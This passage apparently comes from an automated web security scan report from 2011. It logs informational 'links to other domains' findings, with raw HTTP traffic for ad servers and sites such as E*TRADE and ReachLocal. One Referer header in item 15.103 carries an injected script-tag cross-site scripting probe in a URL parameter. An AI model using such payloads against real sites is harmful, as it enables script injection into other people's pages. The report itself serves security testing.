o ear hole. Wilson's perspective is a little different from most players because of his peculiar path to the NFL. He spent two years in jail on a murder charge before winning acquittal in July 2009."><img src="http://l.yimg.com/iu/api/res/1.2/BPKGQ0jdhpW3wZ1h2.sLAg--/YXBwaWQ9eXZpZGVvO2NoPTExNDtjcj0xO2N3PTExNDtkeD05O2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/ef/thumbe.762be49a500597e37c663af513f03336/ap-201109051652607617151.jpg" width="75" height="75"></a>
...[SNIP]...
109051622589677032:1" title="Washington Redskins quarterback Rex Grossman warms up before an NFL preseason football game against the Tampa Bay Buccaneers in Landover, Md., on Thursday, Sept. 1, 2011."><img src="http://l.yimg.com/iu/api/res/1.2/kvW5ryKw33IEylfO4yeWWw--/YXBwaWQ9eXZpZGVvO2NoPTg3O2NyPTE7Y3c9ODc7ZHg9MTtkeT0xO2ZpPXVsY3JvcDtoPTc1O3E9NzA7dz03NQ--/http://d.yimg.com/a/p/sp/ap/5c/thumbe.33d686071b58a0e7f7c893610da085d5/ap-201109051622589677032.jpg" width="75" height="75"></a>
...[SNIP]...
the Washington Redskins in Indianapolis. Manning is doubtful for Sunday's season opener against the Texans as he continues to recover from neck surgery, putting his streak of 227 starts in jeopardy."><img src="http://l.yimg.com/iu/api/res/1.2/7AmHvSwfughfnOWbICRuaQ--/YXBwaWQ9eXZpZGVvO2NoPTEwMjtjcj0xO2N3PTEwMjtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/81/thumbe.69d59efaf75e1ded02d10de93c2dc147/ap-201109051559575906941.jpg" width="75" height="75"></a>
...[SNIP]...
<li><a href="http://www.footballoutsiders.com/" title="Football Outsiders">Football Outsiders <span>
...[SNIP]...
<li><a href="http://espn.go.com/blog/nflnation" title="Hashmarks">Hashmarks <span>
...[SNIP]...
<li><a href="http://kissmesuzy.blogspot.com/" title="Kissing Suzy Kolber">Kissing Suzy Kolber <span>
...[SNIP]...
<li><a href="http://beta.profootballtalk.com/category/rumor-mill/" title="Pro Football Talk">Pro Football Talk <span>
...[SNIP]...
<noscript><iframe src="http://uac.advertising.com/wrapper/aceUAC.htm#site=766755&size=180150"scrolling="no" width="180" height="150" frameborder="0" marginheight="0" marginwidth="0" title="Advertisement"></iframe>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=Ar3rYXBPTB5YfC6vMuLwflDSrYZ4/SIG=123j3k5uq/EXP=1316522681/**http%3A//yahoosports.teamfanshop.com/NFL_Football" class="yspmore"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1305312565.jpg" alt="Shop for NFL Draft Gear!" title="Shop for NFL Draft Gear!"></a>
...[SNIP]...
<div id="n">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.yieldmanager.com/st?_PVID=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081873363&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jvnv6p7/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1/B=3yzPKdj8fcA-/J=1315313081873363/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*"></IFRAME>
...[SNIP]...
</noscript> <img src="http://ad.yieldmanager.com/pixel?id=1246264&t=2" width="1" height="1" /><script language=javascript>
...[SNIP]...
</noscript> <img width="0" height="0" border="0" src="http://ad.yieldmanager.com/pixel?adv=23351&t=2"><script language=javascript>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128nc2v3f(gid$0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1,st$1315313081798920,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.100. http://udmserve.net/udm/img.fetch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440343958:2:2900:0:0:63440343958:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Set-Cookie: dt=9b3eab00-120f-460c-84d6-3607c7ca9d48; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Expires: Mon, 05 Sep 2011 12:45:58 GMT
Date: Tue, 06 Sep 2011 12:45:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-effSsmMYCbAck.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

15.101. https://us.etrade.com/e/t/jumppage/viewjumppage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...
<![endif]-->
   
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/js/nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/global_nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/jquery/jquery.min.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/prospect/tooltip_popup.js" ></script>
    <!-- Site Catalyst -->
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/s_code.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/mbox.js" ></script>
...[SNIP]...
<!-- CSS -->
<link REL="stylesheet" TYPE="text/css" HREF="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/stylesheet/prospect.css" />
   </head>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=865138;type=etrad583;cat=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<div class="popupWin toggleStyle" id="popupImg" onMouseOut="javascript:hidePopupBox('popupImg');" onMouseOver="javascript:showPopupBoxMore();">
   <img USEMAP="#getDetails" NAME="getDetailsImg" ID="getDetailsImg" HEIGHT="200" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_olatf60_pop.png" BORDER="0" WIDTH="279" />
</div>
...[SNIP]...
<div style="position:absolute;">
               <img USEMAP="#logomap" HEIGHT="200" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_15037_header-bearish.png" BORDER="0" WIDTH="970" />
           </div>
...[SNIP]...
<NOSCRIPT><a href="//etrade.wsod.com/click/6dff618a4426d4ef3931d4e373e86b4d/38.67.img.0x0/" target="_blank"><img SRC="//etrade.wsod.com/embed/6dff618a4426d4ef3931d4e373e86b4d/38.67.img.0x0/" /></a>
...[SNIP]...
<NOSCRIPT><a href="//etrade.wsod.com/click/6dff618a4426d4ef3931d4e373e86b4d/39.68.img.0x0/" target="_blank"><img SRC="//etrade.wsod.com/embed/6dff618a4426d4ef3931d4e373e86b4d/39.68.img.0x0/" /></a>
...[SNIP]...
<div class="subhead_evenmore">
                       <img HEIGHT="42" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_subhead-get-even-more.png" BORDER="0" WIDTH="246" />
                   </div>
...[SNIP]...
<div class="FLticker">
                           <img ALT="Easy-to-use idea generating tools" HEIGHT="50" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_icon-tools.png" WIDTH="50" TITLE="Easy-to-use idea generating tools" />
                       </div>
...[SNIP]...
<div class="FLticker imgtick">
                           <img ALT="Find investments with Easy-to-use idea generating tools" HEIGHT="50" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_icon-top5lists.png" WIDTH="50" TITLE="Find investments with Easy-to-use idea generating tools" />
                       </div>
...[SNIP]...
<div class="FLticker imgtick">
                           <img ALT="See The Top Mistakes Traders Make" HEIGHT="50" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_icon-3minvideos.png" WIDTH="50" TITLE="See The Top Mistakes Traders Make" />
                       </div>
...[SNIP]...
<div class="tickerrail1 tickerrail-topPadding"><img USEMAP="#howitworks" ID="hiwImg" HEIGHT="137" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_cta-tradefree-500.png" BORDER="0" WIDTH="264" /></div>
...[SNIP]...
<div>
           <img SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14827_bottom-box-simple.png" BORDER="0" />
       </div>
...[SNIP]...
<div class="need-help-img"><img HEIGHT="85px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_need-help-people_02_02_2011.png" WIDTH="105px" /></div>
           <div class="cust-ser-icon-div"><img HEIGHT="45px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_icon-customer-service_02_02_2011.png" WIDTH="44px" /></div>
...[SNIP]...
<div class="icon-call"><img HEIGHT="51px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_icon-call_02_02_2011.png" WIDTH="46px" /></div>
...[SNIP]...
<div class="branch-icon"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_icon-branches_02_02_2011.png" WIDTH="59px" /></div>
...[SNIP]...
<a href="/e/t/welcome/whychooseetrade"><img HEIGHT="46px;" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_5star-trading-tools-customer-service-footer_02_03_2011.png" WIDTH="222px;" /></a>
...[SNIP]...
<a href="/e/t/mobile_pro"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-mobile.png" WIDTH="38px" /></a>
...[SNIP]...
<a class="footer-four-img-margin" href="/e/t/jumppage/viewjumppage?PageName=etrade_super_tv_ads"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-tv.png" WIDTH="39px" /></a>
...[SNIP]...
<a class="footer-four-img-margin" href="javascript:etWin('/e/t/jumppage/viewjumppage?PageName=facebook_footer','facebook',1000,700,'no','no','yes','no','yes',20,20,'');"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-facebook.png" WIDTH="38px" /></a>
                <a class="footer-four-img-margin" href="javascript:etWin('/e/t/jumppage/viewjumppage?PageName=youtube_footer','youtube',1000,700,'no','no','yes','no','yes',20,20,'');"><img HEIGHT="37px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-youtube.png" WIDTH="38px" /></a>
...[SNIP]...

15.102. http://utdi.reachlocal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /?scid=2323693&kw=233292&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26kw%3D233292; domain=.reachlocal.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.reachlocal.com; path=/
Location: http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0
Vary: Accept-Encoding
Content-Length: 1036
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&amp;RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&amp;RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0">here</a>
...[SNIP]...

15.103. http://utdi.reachlocal.net/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /index.html?scid=2323693&cid=e78be HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=e78be%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3E08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:09:52 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb101
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22612
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:34:45 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<td bgcolor="#016FAA"><img src="//rtsys.rtrk.com/campaign_images/d837/837045/utdi-tophead_8772671235.jpg" width="800" height="110" border="0" usemap="#Map"></td>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="780" height="220" title="Header">
<param name="movie" value="UTDI-flasheader.swf">
...[SNIP]...
<td class="maintext"><a href="http://service.utdi.com/portal/customer/customerlogin.asp?logout=auto" TARGET="RL_top"> <span class="maintext2">
...[SNIP]...
</table>
<a href="http://www.utdistore.com/" TARGET="_blank"><img src="images/Rsidepanel_UTDiStore.jpg" width="260" height="136" border="0">
...[SNIP]...
<td valign="top" class="maintext"><a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=11090605095230846&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top"><img src="images/spacer.gif" width="221" height="95" border="0">
...[SNIP]...
</strong><a href="http://www.zoomerang.com/Survey/?p=WEB228CDDGAGTE" class="onbluemenu">We care! <br>
...[SNIP]...
<u><a href="http://www.utdi.com/survey-1.html" class="onbluemenu"><strong>
...[SNIP]...
</u>&nbsp;to give us your feedback.
For Project/Installation feedback, <a href="http://www.utdi.com/survey-2.html" class="onbluemenu"><strong>
...[SNIP]...
<div align="right"><a href="http://www.facebook.com/pages/UTDi/111259549273#/pages/UTDi/111259549273" TARGET="_blank"><img src="/images/Bottom_facebook.jpg" width="243" height="37" border="0">
...[SNIP]...
<span class="maintext"><a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=11090605095230846&ptt=4&target_email=info@utdi.com" TARGET="RL_top" class="onbluemenu">info@utdi.com</a>
...[SNIP]...
</html>

<script type="text/javascript" src="//rtsys.rtrk.com/js/TrackLandingPage_src.js">
</script>
...[SNIP]...

15.104. http://view.atdmt.com/TR1/iview/332867993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAU.DN72jIMM8N8EGoOg0AEJIrBVbxYCAkGYUEkQfPrl1qjtfd9l-56H931GmLjVcOQchViFVHyxqgBMcKvKaGQZyPVMAyqI6RhovHR2l9a0i-yJ2ke3WYpr9U2XvhNpQyke-OqlKG0xh79GPBv-cnpfJv-H1qZdzcaDPOrWrGaOPPCNe.alt3HUQyfv-x-ugq1mRV3QeSUwRi-b6IDmUaptomyQxD9qp5RoMX9.VKM9l3XPAKQl.UuKZWkzZRLsq9rJa0r8OI-CUga-PF21I8gEIwzjrECNY0TXWcDGTLkGCmcDD1GgSVOTd12J.AiEKFU44g8Bu4cge2l7ISscjRzXJp65bJ088qiKMKOSn7HqQliEcvJbAbs9VxADAlGKlYJmIq0bs7ble.ObdbIRVNEpdIXoceDfcaSA6mczJbj6fYLmGL92Z5lZlqLS.4AvKvMoKUSBjHXGfBFy5N-nS4P3qTY7d5xuLns0joEUlDENTasLIQKfv64pXL95p9E.gD-PabZ, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAKjdGABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkUwEvWfquCkNTvJHg9xPRNBp4BwKItE8yE2ryAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1ufq9q%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DXvrxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D3618678928%26cb%3D1315313105713897%26i%3D140509%26r%3D0,10a65710-d886-11e0-be99-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close
Content-Length: 9400

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUE1zokAU.DN72jIMM8N8EGoOg0AEJIrBVbxYCAkGYUEkQfPrl1qjtfd9l-56H931GmLjVcOQchViFVHyxqgBMcKvKaGQZyPVMAyqI6RhovHR2l9a0i-yJ2ke3WYpr9U2XvhNpQyke-OqlKG0xh79GPBv-cnpfJv-H1qZdzcaDPOrWrGaOPPCNe.alt3HUQyfv-x-ugq1mRV3QeSUwRi-b6IDmUaptomyQxD9qp5RoMX9.VKM9l3XPAKQl.UuKZWkzZRLsq9rJa0r8OI-CUga-PF21I8gEIwzjrECNY0TXWcDGTLkGCmcDD1GgSVOTd12J.AiEKFU44g8Bu4cge2l7ISscjRzXJp65bJ088qiKMKOSn7HqQliEcvJbAbs9VxADAlGKlYJmIq0bs7ble.ObdbIRVNEpdIXoceDfcaSA6mczJbj6fYLmGL92Z5lZlqLS.4AvKvMoKUSBjHXGfBFy5N-nS4P3qTY7d5xuLns0joEUlDENTasLIQKfv64pXL95p9E.gD-PabZ,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.105. http://view.atdmt.com/TR1/iview/332867993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
